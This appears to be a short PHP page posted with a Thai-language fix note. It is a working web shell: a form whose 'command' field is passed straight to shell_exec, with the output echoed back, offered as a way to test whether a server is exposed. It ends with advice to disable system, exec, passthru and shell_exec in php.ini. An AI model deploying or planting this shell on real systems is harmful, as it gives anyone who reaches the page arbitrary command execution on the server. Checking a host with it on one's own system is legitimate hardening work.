<HTML>
<BODY>
<PRE>
<FORM METHOD="post" ACTION="cmd.php">
<INPUT TYPE="TEXT" NAME="command">
<INPUT TYPE="Submit">
</FORM>
<PRE>
<?
$command = str_replace("\\\\","\\",$_POST[command]);
echo "<B>Results for $command: </B><P>";
$results = str_replace("<","<",shell_exec($command));
$results = str_replace(">",">",$results);
echo $results;
?>
</PRE>
<P>
<B>If this script works add this line to your PHP.ini:</B>
<FONT color="#ff0000">disable_functions=system,exec,passthru,shell_exec</FONT>
</BODY>
</HTML>
---------------------------------------------------------------------------
วิธีแก้ไข
ใน php.ini ตรง disable_functions
disable_functions=system,exec,passthru,shell_exec
ไม่มีความเห็น